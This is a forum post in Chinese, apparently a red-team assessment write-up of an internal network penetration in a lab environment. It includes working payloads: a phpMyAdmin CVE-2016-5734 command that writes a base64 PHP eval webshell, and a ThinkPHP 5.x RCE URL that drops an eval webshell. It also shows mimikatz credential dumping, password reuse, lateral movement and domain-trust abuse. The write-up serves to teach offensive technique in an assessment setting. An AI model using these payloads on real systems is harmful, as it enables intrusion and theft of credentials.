奇安信攻防社区-一次简单的攻防考核

一次简单的攻防考核

前段时间进行了一次攻防考核，时间为一周，边干活边考核，所以基本都在晚上活动。之前一直没有复盘这个过程，今天趁此机会整理一下。

0x00 前言
=======

靶标是商业计划书，但是因为是考核，所以目标主要还是以拿权限为主。正如所见，我的文笔就如技术一样拉胯，所以如果有不足的地方请各位大佬多多包涵，也希望各位大佬多多指正。言归正传，给的入口是4个网段，分别是10.255.200.*、10.255.210.*、10.255.220.*和10.255.230.*

0x01 信息搜集
=========

使用fsan工具快速扫描，发现 10.255.200.1/24段存在大量主机，其他三个网段没扫出来，再使用nmap扫描发现10.255.220.1/24网段存在一台主机，如下图：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-3176e6e05a0f07340b761baaf21415abd3c210b3.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-f823bc949f66af6868ad3fa9a9b022c356afa030.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-2c16eee1ea4c7b18bd121d130e15d9c06c3d6512.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-0ab4b7923bf50327b901216b25b5afe665163849.png)

接下来开始漏洞搜集和利用

0x02 10.255.200.23 phpmyadmin远程代码执行
===================================

访问首页发现是有PHPmyadmin(忘截图了)，尝试用弱口令root/root成功登录

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-1710d1670366d018c6fd06a5d438a9d1d2b14991.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-fce52c06a36f9410be29e585250b5aa6f9566717.png)

从后台可以看出版本为4.4.15.6，这个版本存在远程代码执行漏洞CVE-2016-5734，既然已经知道账号和密码，就可以执行利用这个漏洞执行命令了  
EXP地址：<https://www.exploit-db.com/exploits/40185>  
执行命令：

```php
python exp.py -u root --pwd="root" http://10.255.200.23:8080 -c "system('whoami');"
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-e6e90b8d20bc0ee30be5a9d39b0ffac5d3efa0e7.png)

写入webshell：

```php
python exp.py -u root --pwd="root" http://10.255.200.23:8080 -c "file\_put\_contents('shell.php',base64\_decode('PD9waHAgZXZhbCgkX1JFUVVFU1RbbWRybWRyXSk7Pz4='));"
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-24f92550a2ab634aaeabf091839fbe2a60e5fa8b.png)

连接webshell:

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-2d44bc6b074cc04eef52d70c93c8d2a310926931.png)

0x03 10.255.220.220 致远OA session泄露任意文件上传
========================================

刚开始我以为漏洞利用点是命令执行，后面才发现是利用session泄露任意文件上传漏洞

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-c051c2916a3483e8eddd8407e4e5c70431106d27.png)

session泄露

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-b21ca9f0ebc90273714433961da3abbc80b8d6d1.png)  
漏洞利用参考：<https://blog.csdn.net/maverickpig/article/details/118916085>  
参考链接中的脚本我使用时有点问题，第一次请求获取cookie后第二次文件上传没有带上cookie，所以脚本中的cookie是我手动获取cookie后加上去的，可能是我环境的原因，无伤大雅。可以将get\_cookie函数中的cookies设置为第一次获取的cookie值，比如这样：

```php
cookies = {"JSESSIONID":"6C86F4036B5933A4DC56AF3754B41703"}
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-81bc267b7d8707a628cf4e24de1a4e103b80eba4.png)

冰蝎连接webshell，然后上线CS

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-bb8e4130aa89a966fa839cbf77828387758af09f.png)

使用svc-exe提权：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-a9b062754d8473365d4e267134b5a09b82f42527.png)

运行mimimkatz抓取10.10.220.100上的密码：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-010b4e0b055cc7f8c20f66bc2aa92ff4021b976a.png)

解密得到密码 seeadmin123...

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-9ff10c8898d4933415cd418cb70e10716891717c.png)

利用CS搭建代理：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-61b7a275520eba4d76b8a72b489b5fa2f0e4fa45.png)

连上代理后远程桌面：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-9cd672eaeed30ea6648a887c0a0461b6971f954c.png)

0x04 10.10.220.101 SqlServer命令执行
================================

远程登录10.10.220.100后执行命令查看网络连接信息，发现与主机10.10.220.101的1433端口存在连接，猜测为站库分离，如下：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-2fde22f39638fa75013f513664e6dc4aafb21907.png)  
然后在10.10.220.101上查找数据库配置文件，最终在目录C:\\Seeyon\\A8\\S1\\client下发现配置文件，如下：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-534dddc5d9c609217b2762ff34d1c4614d78294e.png)

发现数据库密码密文：YjliOTIzNC8vLw==

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-78125563cdc5eb0dccd79f4dbde36e3fa3d19048.png)  
然后使用Python脚本解密，得到密码a8a8123...，脚本如下：

```php
import base64

a="YjliOTIzNC8vLw=="

password=""

b = base64.b64decode(a).decode("utf-8")

print(b)

for i in b:

password+=chr(ord(i)-1)

print(password)
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-62e316a34c368fce0ec350a118e22e8f60b1b9a3.png)

使用数据库连接工具成功连接：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-04923cb9493daa1a48a2c71525a361c17e3d337e.png)

利用xp\_cmdshell执行命令，下载CS马：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-c51101de8f7efd5bd0dfcb2688748669529d10d4.png)

之后运行木马成功上线

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-961d41ccbf75628c2582bc63fe94490919aac763.png)

同样运行mimikatz抓取本地明文密码，得到密码adin1AZ123...

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-3f022142062ea14e4fe551fe8d2bf0e459625565.png)

0x05 10.255.200.44 泛微OA远程代码执行
=============================

漏洞地址： <http://10.255.200.44/weaver/bsh.servlet.BshServlet>

执行命令有waf拦截：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-8aba59006f1e7843f9618fe61f82d3da5349fd26.png)

Unicode编码即可绕过：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-56842fe2dd8a93bfb0c94fdd17d63b8ac1b152ab.png)  
执行命令将webshell代码进行base64编码后写入C:\\\\Ecology\\\\ecology\\\\wui\\\\1.txt（该目录可解析）

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-28bdbd6cb332f6bd3676bad691f6161ef5c828b3.png)  
然后 将1.txt中的代码进行base64解码后写入mdrmdr2.jsp

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-3254d2113f55b44179ebc80fb3e6c22e055c5d02.png)

访问webshell，成功执行命令：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-971d9b1a62291dc8a4f35c79f6dd4b00979a0bc1.png)

利用webshell上传CS马然后运行上线CS，同时发现其IP为80.1.1.44：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-6b68d8354698d9323adc24725d94fa276f642a5e.png)

抓取本地密码，获取到hash值：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-0e3111ca5bf89f27c6b7f3362039597826cdb03a.png)

在线解密得到密码admin@123456

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-8f73a2974fc6c10bc0c98d28c3dfeb49923e6780.png)

使用CS搭建代理，挂上代理后对C段80.1.1.1/24进行扫描，部分内容如下：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-1caecd50dc6905b7d3a43ce8a616d376e439ff6c.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-5564fbe61e136fb41a381f4c6b59513528f87d1e.png)

看到这个结果后我头皮发麻，让有选择困难症的我一时无从下手

0x06 80.1.1.36 用友OA远程命令执行
=========================

漏洞地址： <http://80.1.1.36:801/servlet/~ic/bsh.servlet.BshServlet>

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-95c4cda46d550c74dc05d08525700a9c0a5a5cff.png)

利用方式和10.255.200.44一样，写入webshell（过程略）：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-9242a2f4238475bddc700ed0a69012b732c408fe.png)

同样的方法上传CS马执行上线，发现为一台DC：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-aae24d7411547d0b82ec9fa03ebbe5e78712f9b8.png)

抓取主机上的密码：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-d6ad8d58db536ff41e3d1e47338ae6eeff3247d1.png)

解密得到 密码admin@12345+

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-947f49e568207308fc7b7e04a576fc3fabc8c848.png)

0x07 80.1.1.12 ThinkPHP5.x远程代码执行
================================

熟系的首页，以及醒目的ThinkPHP

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-fafe35c11e13ba4c4a4d2d51c9f39cea5c618f41.png)  
发现其果然存在远程命令执行漏洞，利用远程命令执行漏洞写入webshell：

```php
http://80.1.1.12/?s=index/\\think\\app/invokefunction&function=call\_user\_func\_array&vars\[0\]=system&vars\[1\]\[\]=echo%20^%3C?php%20@eval($\_REQUEST\[%22cmd%22\])?^%3E%3Eshell.php
```

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-850c340bd0756511f244e3cdbff31d0f4e34f10d.png)

之后上线CS：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-1a76088110f50595ed3bd01427cd20e895f9cafc.png)

0x08 80.1.1.15、80.1.1.88、 10.255.200.20和80.1.1.37 密码复用
======================================================

利用搜集到的密码制作字典，然后使用fscan工具对80.1.1.1/24进行爆破，得到80.1.1.15、80.1.1.88、10.255.200.20和80.1.1.37四台主机的权限

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-c2591a5661a63730938392a98d25dda9bac6049b.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-ebb9a80d83abcc0632a0df9e18fbdb13383db233.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-65c21752c74b03553e4cd44fbb072babcd0b4fe9.png)

之后将10.255.200.20上线CS，有了账号和密码可以直接使用psexec执行命令上线，我这里先将CS马拷贝过去，然后再执行上线：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-001728cd18806db8e407c7d46946e5a473ddc739.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-6974705f6263649db022a65b2708f881313cc7d6.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-60b2f4c87bef7adca18258800e8f6ae952ad57c9.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-a0e6e62fe55032695107cbdafb0490beda814136.png)

上线后发现其IP为40.1.1.30：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-888cf60b625bb6106264d34e639456f962f19196.png)

0x09 50.1.1.180（DC1）
====================

上线主机40.1.1.30后进行简单主机信息搜集，发现其在xihongdream.com内，ping域名xihongdream.com，得到IP为50.1.1.180，初步判断主机50.1.1.180可能为域控

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-52a9ba786ee8dbd2a7b73797dfb84f9416384037.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-cbdc949bbc565aba6cb38399b4ae399089d97f79.png)

执行netstat -ano命令查看网络连接情况，发现主机与50.1.1.180的389端口存在连接，因为该端口为域控常用端口，故确定主机50.1.1.180为域控（这里也可以通过端口扫描进行确认）

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-c804b29acfe6afaf211f86ebd409db32dfbee683.png)

抓取本地密码hash，发现域用户oaexchange

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-6baf2ec803ad3fd55c9bfb261e1b65ba377de168.png)

破解其NTLM值4fec0483465a124269c47fafd757f18f得到密码admin@1234

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-e18bdfffb09874dd369f00ef86af8095569bffab.png)

然后这里使用老方法先与域控50.1.1.180建立IPC$连接：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-953058f8e97b533430eae8c94bef1df7c17aca8c.png)

将本地的木马复制到域控上：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-6510b11b015c7be69c61ae3e130f3c980c41db62.png)

之后添加计划任务运行木马：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-9ecb4b77d7db8b4a2531be1516f0db1bfe6390a8.png)

成功上线：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-48964bf05ad63c207db8195e41bbc83f0bc2cb5a.png)

0x10 50.1.1.181(DC2)
====================

在50.1.1.180上查看域内主机，发现还有一台域控DC2

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-010612da8e853bf55af3a85a3faa26f69ac4dce4.png)

然后同样用上线DC1的方法上线DC2

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-6ac7e8528ff6a556b8a9324619e42b447e95ff5f.png)

拿到DC1和DC2权限后，获取域内其他主机权限就轻而易举了，这里不作阐述

0x11 40.1.1.99
==============

在DC1上搜集域信息，查看域信任时发现还有个子域pcin.xihongdream.com,其对应的域控IP为40.1.1.99

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-f6f3556ef0fbe70527143abb38ff3754f2f6ead3.png)

利用域信任，使用凭据传递获取权限

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-5c849cac3dbb735881a445faedfa7e019c74e732.png)

因为40.1.1.99不出网，需要利用40.1.1.30搭建会话中转

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-dce76ef7d7fe63b3e8b484f95f16b3308370de26.png)

然后计划任务上线：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-837976cecd5a1f8619fe71faaf1126b927d59f95.png)

0x12 40.1.1.128 密码复用
====================

使用搜集到的密码对40.1.1.1/24进行smb登录爆破，得到40.1.1.128的密码seeadmin123...

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-4cdcf1630f3731db7f037c4e65cc9e01c5997169.png)

之后通过凭据传递上线CS：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-ce5ea7e394276cb1b37638d5dd39ca28f69d7f95.png)

打到这里的时候，我以为所有网段都已经出现了，然后就没有继续深挖。之后快结束的时候我在DC1上随手ping了一下60.1.1.1，发现居然通了，心态直接炸了，没想到还有隐藏的网段，而现在离结束只有1个小时不到

0x13 60.1.1.35、60.1.1.112、60.1.1.120和60.1.1.121 密码复用
====================================================

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-8330e5519db9f00c898b65f53e9392cea80c8f76.png)

没办法，打点的话已经来不及了，最快速的方法就是密码复用，接着使用之前的密码字典爆破了C段60.1.1.1/24，成功拿到了4台主机权限：

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-9f64a57cb8dac6dc48a70d4c5d1ec06a27410aed.png)

结果没想到又又又出现了新网段10.2.120.9(60.1.1.35)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-9648f32af38a3eda9749a44d1e04b57dc9897457.png)

![图片.png](https://shs3.b.qianxin.com/attack_forum/2022/04/attach-199abb0e43c3de5e6fa8b4078ece67e0656df7a2.png)

0x14 总结
=======

问题较多，不做一一总结，简言之，思路和姿势上都存在不足，打法上也没有按照流程走，基本上都是扫到哪打到哪。这环境也实在是太大了，头皮发麻，其中有许多主机权限都来不及拿。

发表于 2022-04-20 09:43:43
阅读 ( 10311 )
分类：内网渗透

3 条评论

rux_5 2022-04-22 08:40

可以可以非常不错

谢尔曼 2022-04-27 18:55

这漏洞也太多了

0x536d72 2022-10-25 16:11

cs 上线操作打的，毫无观赏性····